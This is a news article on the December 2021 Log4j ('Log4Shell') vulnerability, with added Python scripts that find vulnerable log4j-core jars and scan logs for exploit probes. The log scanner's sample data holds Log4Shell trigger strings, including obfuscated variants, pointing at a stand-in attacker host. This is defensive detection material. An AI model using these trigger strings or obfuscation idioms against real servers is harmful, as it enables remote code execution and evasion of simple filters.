

Millions of devices at risk from software flaw – cyber experts

14 Dec 2021 / technology

Millions of devices flagged at risk from software flaw

Digital devices worldwide could be exposed to software flaws that hackers are actively exploiting, US officials have warned.

The vulnerability is in a piece of Java-based software known as ‘Log4j’ that some of the world’s biggest tech firms use to record log information in their applications.

Amazon Web Services and IBM have already moved to address the flaw, which could give attackers access to a computer server and, from there, to the rest of a network.

‘Most serious’ vulnerability

“This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), said.

“We expect the vulnerability to be widely exploited by sophisticated actors, and we have limited time to take necessary steps in order to reduce the likelihood of damaging incidents,” she added.

The security flaw poses a “severe risk” to the internet, Easterly said. “This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use.”

‘On fire’

The problem with Log4j was first widely publicised through the video game Minecraft, but its impact on other web applications quickly became apparent. The software is used in millions of applications, including Apple’s iCloud.

Attacks exploiting the bug, known as ‘Log4Shell’ attacks, have been happening since 9 December, says Adam Meyers of security company Crowdstrike. “The internet’s on fire right now.” 

It could take weeks to address the vulnerabilities.

Security fix

The Apache Software Foundation, which manages the Log4j software, has released a security fix for organisations to apply, but the patch alone is not fail-safe: it only protects once every application that bundles the vulnerable library has been updated or rebuilt, and the first fix was itself superseded by later releases.

CISA says that it will set up a public website with information on what software products have been affected by the vulnerability, and the techniques that hackers are using to exploit it, in order to counteract misinformation on social media.  

New Zealand’s Computer Emergency Response Team (CERT NZ) and others have reported that attackers are actively scanning for servers vulnerable to Log4Shell attacks. These efforts will continue, and expand, so addressing the vulnerability as soon as possible is critical.

To prevent attacks, CERT NZ recommends upgrading every installation of Log4j to version ‘Log4j-2.15.0’ or later.
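
Before anything can be upgraded it has to be found, and log4j-core is frequently buried inside WAR, EAR or “fat” application jars rather than sitting on disk under its own name. As an added example (not code from the article, from CERT NZ or from the Log4j project), the following Python script inventories a directory tree for copies of log4j-core, recurses into nested archives, and reports those below the 2.15.0 threshold the article cites. The directory layout it builds in a temporary folder is a constructed fixture and the helper names are assumptions; the class path org/apache/logging/log4j/core/lookup/JndiLookup.class is the real class that implements the vulnerable lookup, used here to catch renamed or shaded copies whose version is not in the file name.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import Iterator, List, Tuple

# Log4Shell is fixed from log4j-core 2.15.0 (the version the article cites);
# later releases supersede it. Log4j 1.x is a different code base and is not
# assessed by this script.
FIXED_VERSION = (2, 15, 0)
JAR_NAME = re.compile(r"log4j-core-(\d+(?:\.\d+)+)\.jar$", re.IGNORECASE)
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Class implementing the JNDI lookup; its presence flags a renamed/shaded copy.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MAX_DEPTH = 4  # archives nested inside archives: how deep to look


def parse_version(text: str) -> Tuple[int, ...]:
    parts = [int(p) for p in text.split(".")][:3]
    return tuple(parts + [0] * (3 - len(parts)))  # "2.14" -> (2, 14, 0)


def is_vulnerable(version: str) -> bool:
    """True for any 2.x log4j-core below 2.15.0, or when the version is unknown."""
    if version == "unknown":
        return True
    v = parse_version(version)
    return v[0] == 2 and v < FIXED_VERSION


def _scan_archive(zf: zipfile.ZipFile, location: str, depth: int) -> Iterator[Tuple[str, str]]:
    names = zf.namelist()
    if JNDI_CLASS in names:
        yield location, "unknown"  # shaded or renamed copy: version not in the name
    for name in names:
        m = JAR_NAME.search(name)
        if m:
            yield f"{location}!{name}", m.group(1)
            continue
        if name.lower().endswith(ARCHIVE_SUFFIXES) and depth < MAX_DEPTH:
            try:
                with zf.open(name) as fh, zipfile.ZipFile(io.BytesIO(fh.read())) as inner:
                    yield from _scan_archive(inner, f"{location}!{name}", depth + 1)
            except zipfile.BadZipFile:
                continue


def find_log4j_core(root: str) -> Iterator[Tuple[str, str]]:
    """Yield (location, version) for every log4j-core found under root."""
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            m = JAR_NAME.search(fn)
            if m:
                yield path, m.group(1)
            elif fn.lower().endswith(ARCHIVE_SUFFIXES):
                try:
                    with zipfile.ZipFile(path) as zf:
                        yield from _scan_archive(zf, path, 1)
                except zipfile.BadZipFile:
                    continue


def vulnerable_jars(root: str) -> List[Tuple[str, str]]:
    return sorted((loc, ver) for loc, ver in find_log4j_core(root) if is_vulnerable(ver))


def make_sample_tree(root: str) -> None:
    """Constructed fixture (assumption): three archives as an app server might hold them."""
    def write_zip(path: str, entries: dict) -> None:
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as zf:
            for name, data in entries.items():
                zf.writestr(name, data)
    stub_class = b"\xca\xfe\xba\xbe"  # class-file magic only; content is irrelevant here
    # 1. plain copy on disk, vulnerable by version
    write_zip(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), {JNDI_CLASS: stub_class})
    # 2. patched copy buried inside a WAR
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(JNDI_CLASS, stub_class)
    write_zip(os.path.join(root, "webapps", "app.war"),
              {"WEB-INF/lib/log4j-core-2.15.0.jar": inner.getvalue()})
    # 3. shaded fat jar: version absent from the name, lookup class still present
    write_zip(os.path.join(root, "svc", "service-all.jar"),
              {JNDI_CLASS: stub_class, "com/example/Main.class": stub_class})


def demo() -> List[Tuple[str, str]]:
    """Build the fixture in a temp dir and return vulnerable findings relative to it."""
    with tempfile.TemporaryDirectory() as root:
        make_sample_tree(root)
        return sorted((os.path.relpath(loc, root), ver) for loc, ver in vulnerable_jars(root))


if __name__ == "__main__":
    for location, version in demo():
        print(f"VULNERABLE {version:>8}  {location}")
```

A version in the file name is only a hint: a copy reported as “unknown” needs a manual look, and an empty result does not prove a host is clean, since applications can load Log4j from paths outside the tree that was scanned.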

What exactly is Log4j?

Almost all of the software we use keeps records of errors and other significant events, known as ‘logs’. Rather than writing their own logging code, many software developers use the open-source Log4j library, making it one of the most widely used logging packages in the world.

The popularity of Log4j has now become a liability, however. The flaw affects millions of pieces of software, running on millions of machines, that people interact with every day.

Malicious code

Attackers can trick vulnerable versions of Log4j into running malicious code simply by getting it to log a message that contains a specially crafted string of text: the library treats part of the string as a lookup instruction, fetches code from a server the attacker controls, and runs it.

How attackers deliver the string varies from program to program but, in Minecraft, it has been reported that this is being done via chat boxes. A log entry is created to archive each message, so if the dangerous string of text is sent from one user to another, it is written into a log.

In another case, Apple servers were found to create a log entry recording the name that an iPhone’s owner gives the device in Settings.

Once such a log entry has been created, the attacker can run any code they like on the server, including code that steals or deletes sensitive data.
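
The defensive counterpart to the three scenarios above is to look in existing logs for the trigger string itself. As an added example (not code from the article or from the Log4j project), the following Python scans constructed log lines for the lookup that Log4Shell abuses, the ${jndi:...} form. The sample lines, the 203.0.113.x addresses and the function names are assumptions for illustration. The script goes beyond a plain search: attackers routinely hide the trigger behind nested lookups such as ${lower:j} or the ${...:-j} default-value idiom, which a naive grep for “${jndi:” misses, so the scanner first collapses those idioms and only then matches.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample log lines (not captured traffic); 203.0.113.0/24 is a
# documentation range. Line 2 is the plain trigger; lines 3 and 4 hide the same
# lookup behind nested lookups; line 5 is a harmless lookup that must not match.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://203.0.113.10:1099/x}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/x}"',
    '<player1> hello ${env:HOME}',
]

# An innermost lookup: "${" ... "}" with no further "$", "{" or "}" inside it.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The trigger itself, matched only after obfuscation has been stripped.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Evaluate the lookup idioms used purely for obfuscation; None if not one of them."""
    if ":-" in body:                        # ${name:-default} -> default (also ${::-j})
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.lower().startswith("upper:"):
        return body[len("upper:"):].upper()
    return None                             # ${jndi:...}, ${env:...}: leave in place


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost obfuscating lookups until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def replace(m) -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNERMOST_LOOKUP.sub(replace, text)
        if not changed:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, de-obfuscated line) for every line carrying the trigger."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: {line}")
```

Only the lower, upper and default-value idioms are collapsed here; other lookup types that can be nested are left in place, so a hit proves a probe was attempted while a miss does not prove the opposite. The de-obfuscated line is returned alongside the line number so that an analyst sees the real target host and scheme rather than the disguised form.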

Gazette Desk
Gazette.ie is the daily legal news site of the Law Society of Ireland